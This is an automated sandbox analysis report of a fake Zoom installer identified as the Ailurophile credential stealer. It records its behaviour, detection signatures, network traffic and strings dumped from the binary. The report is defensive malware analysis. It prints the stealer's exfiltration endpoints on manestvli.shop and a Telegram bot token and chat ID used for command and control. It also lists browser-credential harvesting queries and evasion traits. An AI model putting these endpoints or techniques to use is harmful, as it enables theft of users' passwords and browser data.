Windows Analysis Report
ZoomInstaller.exe

Overview

General Information

Sample name: ZoomInstaller.exe
Analysis ID: 1544493
MD5: 806a6ccce380785faa45512ce603c580
SHA1: 78a2936e19f0474f80f73144564e9f24c4559859
SHA256: c831aebefaf218907d8164288a8249755c47f68b5a6dd223dcef2d150d8df396
Tags: exeuser-NDA0E
Infos:

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Detected generic credential text file
Installs new ROOT certificates
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

AV Detection
barindex
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 90.7% probability
Machine Learning detection for sample
Source: ZoomInstaller.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFD9BAB52AE CryptUnprotectData, 15_2_00007FFD9BAB52AE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFD9BAD52AE CryptUnprotectData, 17_2_00007FFD9BAD52AE
Source: ZoomInstaller.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2057103 - Severity 1 - ET MALWARE Win32/Ailurophile Stealer CnC Domain in DNS Lookup (manestvli .shop) : 192.168.2.4:65406 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057104 - Severity 1 - ET MALWARE Observed Win32/Ailurophile Stealer Domain (manestvli .shop) in TLS SNI : 192.168.2.4:49737 -> 188.114.97.3:443
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 104.26.9.59 104.26.9.59
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: api.myip.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic DNS traffic detected: DNS query: api.myip.com
Source: global traffic DNS traffic detected: DNS query: manestvli.shop
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drTGVaZ3AxOTMzKzRqMldDaGJTYXJxbXRwNWQ4cTJaOG5ubVpmOTFxcllLRnRLYXYwTGl1Z0tQRnFYeWRxOCtXcktLcmpvU3NaNnZSbEtlTmJLeW1sbVp0MDVhbmVJeVZpSmljeEpuSHNYMTlwNmQ4ZW5iZmxOMTNySUYwbDZpdTBLaHNnWDJ6WVh5ZHE4K1ZxM3l1bDJUSHA4WFR0YkY5bzlHWmdIZDkyWHZSaEtxV1k5ZWh2TDZ3b0lPaXE2bUJoMzNaZTlGOFpaaDRuSjdEdmR1cWw3S3JabnllZWM5K3A0Q2VqWW10bk1YZnJHMTlvNk9aZjNkKzA1TzdycUNYcXF4bnE5QzRvSUI4ckpxVlo0cmJscXlBYVgyYjBwcTR2WmlubUlDNG0zeDZncGFMdklpZ2w2cXNwS3ZVeDUrV2dOcWNsM2Q5bkh2T2U1MkFkSzJndzc2eFo1WnNyR1Y4bnFQUGdhZUFiUT09&hash=2d6441c1bfc749b0344f HTTP/1.1Host: manestvli.shopUser-Agent: Go-http-client/1.1Content-Length: 6347Content-Type: multipart/form-data; boundary=c4f7aaa42ff4a8b0a52c6b01c13381cfc6993937b438de4a4efa6525794aAccept-Encoding: gzip
Source: powershell.exe, 0000000F.00000002.1834759671.0000025648BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1815118814.000002563A346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1834759671.0000025648A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FD40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.1863827318.000001405FBCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000F.00000002.1815118814.0000025638A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405E311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.1815118814.000002563A0FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FA0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000011.00000002.1863827318.000001405FBCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000364000.00000004.00001000.00020000.00000000.sdmp, info.txt.0.dr String found in binary or memory: https://ailurophilestealer.com
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ailurophilestealer.com/bot
Source: powershell.exe, 0000000F.00000002.1815118814.0000025638A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405E311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000102000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.myip.com
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot%s/sendMessage
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot%s/sendMessagehttps://api.telegram.org/bot%s/sendMessagechat_id=68432125
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessage
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000011.00000002.1863827318.000001405FBCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.1815118814.0000025639633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405EF42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00032A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://manestvli.shop/upload.php?
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00032A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://manestvli.shop/upload.php?C:
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000212000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://manestvli.shop/upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drT
Source: powershell.exe, 0000000F.00000002.1834759671.0000025648BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1815118814.000002563A346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1834759671.0000025648A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FD40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000F.00000002.1815118814.000002563A0FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FA0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000F.00000002.1815118814.000002563A0FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FA0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000212000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000BE000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000208000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000FC000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C00054A000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000552000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000049000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C00054E000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000080000.00000004.00001000.00020000.00000000.sdmp, history.db.0.dr, Google-Default.txt.0.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000FC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016========
Source: ZoomInstaller.exe, 00000000.00000003.1942189720.000002976C803000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1942109309.000002976C803000.00000004.00000020.00020000.00000000.sdmp, history.db.0.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000212000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000500000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000BE000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000208000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000552000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C00054E000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000080000.00000004.00001000.00020000.00000000.sdmp, history.db.0.dr, Google-Default.txt.0.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000500000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1942189720.000002976C803000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1942109309.000002976C803000.00000004.00000020.00020000.00000000.sdmp, history.db.0.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Installs a raw input device (often for capturing keystrokes)
Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: DestroyEnvironmentBlockreflect.Value.Interfacereflect.Value.NumMethodRemoveFontMemResourceExGetLogicalDriveStringsWSHGetSpecialFolderPathWRegisterRawInputDevicestoo many pointers (>10)segment length too longunpacking Question.Nameunpacking Question.Typeskipping Question Classunsupported certificateno application protocolech accept confirmationCLIENT_TRAFFIC_SECRET_0SERVER_TRAFFIC_SECRET_0QUICEncryptionLevel(%v)varint integer overflowexit hook invoked panicpattern bits too long: GetSidSubAuthorityCountQueryServiceLockStatusWRegNotifyChangeKeyValueSetKernelObjectSecurityDeleteVolumeMountPointWGetActiveProcessorCountSetInformationJobObjectSetNamedPipeHandleStateSetProcessPriorityBoostNtSetInformationProcessGetFileVersionInfoSizeWinvalid PrintableStringx509: malformed UTCTimex509: invalid key usagex509: malformed versionP224 point not on curveP256 point not on curveP384 point not on curveP521 point not on curveinvalid scalar encodingasn1: structure error: truncated tag or length942d6eb00e0cbfd901026890zip: writer closed twicejson: unsupported type: runtime: C malloc failedargument must be a FLOATPRAGMA auto_vacuum = %d;PRAGMA synchronous = %s;application/octet-streamunexpected buffer len=%vinvalid pseudo-header %qframe_headers_prio_shortinvalid request :path %qread_frame_conn_error_%sRequest Entity Too Largehttp: nil Request.Headerexec: Stdout already settracecheckstackownershiphash of unhashable type span has no free objectsruntime: found obj at *(runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAddr = range partially overlapsstack trace unavailable memstr_baf83cf5-4
PE file contains more sections than normal
Source: ZoomInstaller.exe Static PE information: Number of sections : 24 > 10
Sample file is different than original file name gathered from version info
Source: ZoomInstaller.exe, 00000000.00000000.1697687201.00007FF68496E000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSecurePro.exeD vs ZoomInstaller.exe
Source: ZoomInstaller.exe Binary or memory string: OriginalFilenameSecurePro.exeD vs ZoomInstaller.exe
Source: classification engine Classification label: mal76.troj.spyw.evad.winEXE@28/27@3/3
Source: C:\Users\user\Desktop\ZoomInstaller.exe File created: C:\Users\user\AppData\Local\Ailurophile Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cig3xdrr.qj1.ps1 Jump to behavior
Source: ZoomInstaller.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\ZoomInstaller.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002CA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SELECT name, value FROM autofillSELECT name, value FROM autofillPRAGMA busy_timeout = 5000;
Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002CA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SELECT name, value FROM autofillSELECT name, value FROM autofillPRAGMA busy_timeout = 5000;PRAGMA locking_mode = NORMAL;PRAGMA synchronous = NORMAL;
Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00015D000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1944543316.000002976C7FB000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1944783848.000002976C7FB000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1944945030.000002976C7FB000.00000004.00000020.00020000.00000000.sdmp, passwords.db.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: ZoomInstaller.exe String found in binary or memory: failed to construct HKDF label: %sCM_Get_Device_Interface_List_SizeWcrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key size2006-01-02T15:04:05.999999999Z07:00unpaired removeDep: no %T dep on %Tencoding/hex: odd length hex string2006-01-02 15:04:05.999999999-07:002006-01-02T15:04:05.999999999-07:00Non-function passed to RegisterFunc'_' must separate successive digitsform-data; name="%s"; filename="%s"http: server closed idle connectionCONTINUATION frame with stream ID 0executable file not found in %PATH%persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=network dropped connection on resettransport endpoint is not connectedhash/crc32: invalid hash state sizeflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9" is unexported but missing PkgPathreflect.MakeSlice of non-slice typemime: bogus characters after %%: %qtoo many Questions to pack (>65535)file type does not support deadlineunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharehpack: invalid Huffman-encoded datadynamic table size update too largeSubscribeServiceChangeNotificationsbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthcrypto/md5: invalid hash state sizeP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferecb85da208ccedcda3abcbadadfb5fb91423cc98009cc670a9423fd9472b78d5727fbdb18cad2624ace4f40c34ea4b25ed4f06096b5e8cbf70c74380253b0ce5babaf95cd02b767d868ff87e042ab8ab4a2ab596c8cb97fa4249cd843fe7bc726f1bef30912dbabb142ff299crypto/cipher: input not full blockscrypto/rand: argument to Int is <= 0name %q does not begin with a lettersql: converting argument %s type: %wconverting NULL to %s is unsupportedjson: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after
Source: ZoomInstaller.exe String found in binary or memory: failed to construct HKDF label: %sCM_Get_Device_Interface_List_SizeWcrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key size2006-01-02T15:04:05.999999999Z07:00unpaired removeDep: no %T dep on %Tencoding/hex: odd length hex string2006-01-02 15:04:05.999999999-07:002006-01-02T15:04:05.999999999-07:00Non-function passed to RegisterFunc'_' must separate successive digitsform-data; name="%s"; filename="%s"http: server closed idle connectionCONTINUATION frame with stream ID 0executable file not found in %PATH%persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=network dropped connection on resettransport endpoint is not connectedhash/crc32: invalid hash state sizeflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9" is unexported but missing PkgPathreflect.MakeSlice of non-slice typemime: bogus characters after %%: %qtoo many Questions to pack (>65535)file type does not support deadlineunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharehpack: invalid Huffman-encoded datadynamic table size update too largeSubscribeServiceChangeNotificationsbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthcrypto/md5: invalid hash state sizeP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination 